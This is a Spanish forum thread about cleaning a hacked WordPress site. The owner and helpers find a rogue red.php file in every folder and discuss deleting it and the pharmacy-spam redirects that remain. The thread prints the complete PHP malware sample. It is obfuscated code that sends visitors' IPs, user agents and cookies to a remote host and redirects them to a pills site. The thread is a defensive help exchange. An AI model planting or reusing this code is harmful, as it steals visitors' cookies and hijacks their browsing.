 Autor
|
Tema: Mi Wordpress Hackeado (Leído 36,674 veces)
|
ka0s
 Desconectado
Mensajes: 308
|
Borra el archivo red.php de wp-includes. Es un claro malware.
Sigo analizando por si hay otros.
Saludos
Borrado el archivo red.php. Sigo aqui a la espera, y ya lo dije mil veces pero lo sigo diciendo igual. GRACIAS!
|
|
|
|
|
En línea
|
|
|
|
|
MinusFour
|
Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto: Only in wp-includes: red.php
diff -r wp-includes/version.php wp-includes-official/version.php
36,37d35
<
< $wp_local_package = 'es_ES';
De modo que si no era el red.php no creo que haya algo más.
|
|
|
|
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
Me he dado cuenta que el archivo red.php ESTÁ EN TODAS LAS CARPETAS. WP-CONTENT, WP-INCLUDES, PORTADA. Estas seguro que es Malware? El contenido es este: <?$tds="http://fbt.yahoo.com/counter.php";$password="fff123106f3430";$g="http://pills-shop.ru";$esdid="counter3";$key="zzzzgb54y45yb45tktbwtberheh6e4wh";?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen(' '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$tt=$tt."&".$key."=".$n;}$tt=urlencode($tt);if(empty($tt)){$tt=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$tt."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>Perdon que dude, pero me genero esa duda cuando ví que estaba en varias carpetas. Lo borro de todos lados entonces? Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto: Only in wp-includes: red.php
diff -r wp-includes/version.php wp-includes-official/version.php
36,37d35
<
< $wp_local_package = 'es_ES';
De modo que si no era el red.php no creo que haya algo más. Entonces esto responde a lo que acabo de escribir arriba no?. Borro todos los red.php que vea y pruebo la web? |
|
|
|
|
En línea
|
|
|
|
|
MinusFour
|
¿Todos los red.php son iguales? Hasta no verlos todos, no los elimines. Juntalos todos y subelos.
|
|
|
|
|
En línea
|
|
|
|
|
#!drvy
|
Solo con ver $g="http://pills-shop.ru"; Ya sabes lo que hay xD Slaudos |
|
|
|
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
Gracias a los 2!! Ya he borrado todo los red.php (todos eran iguales) Y si entras a la web que pusiste arriba, redirecciona a la de PHARMACY tal como pasaba en la web. Veré si activo mi web, que sucede ahora. Los mantengo al tanto en mi próxima respuesta!! EDITO: Ya he ingresado a la web http://www.wilboradalibros.com.ar/ pero absolutamente TODOS LOS LINKS que clickeo, me llevan a la web de las píldoras  Qué más tendremos que hacer ahora? |
|
|
|
« Última modificación: 25 Julio 2014, 00:22 am por ka0s »
|
En línea
|
|
|
|
|
MinusFour
|
A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.
|
|
|
|
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.
Actualiza muchas veces, yo matuve apretado F5 2 o 3 segundos y luego me cargó bien la web. Deberías verla. Eso si, los links como dije, siguen redireccionando a la p**a página de pildoras
|
|
|
|
|
En línea
|
|
|
|
|
MinusFour
|
Todavia no me aparece. Tengo la cache deshabilitada con 0 cookies y como quiera me sigue cargando la pagina de safemedpills si acceso a cualquier otra dirección.
|
|
|
|
|
En línea
|
|
|
|
|
#!drvy
|
se a mi tambien xD El index ha cambiado pero lo demas no.
Saludos
|
|
|
|
|
En línea
|
|
|
|
|
 |
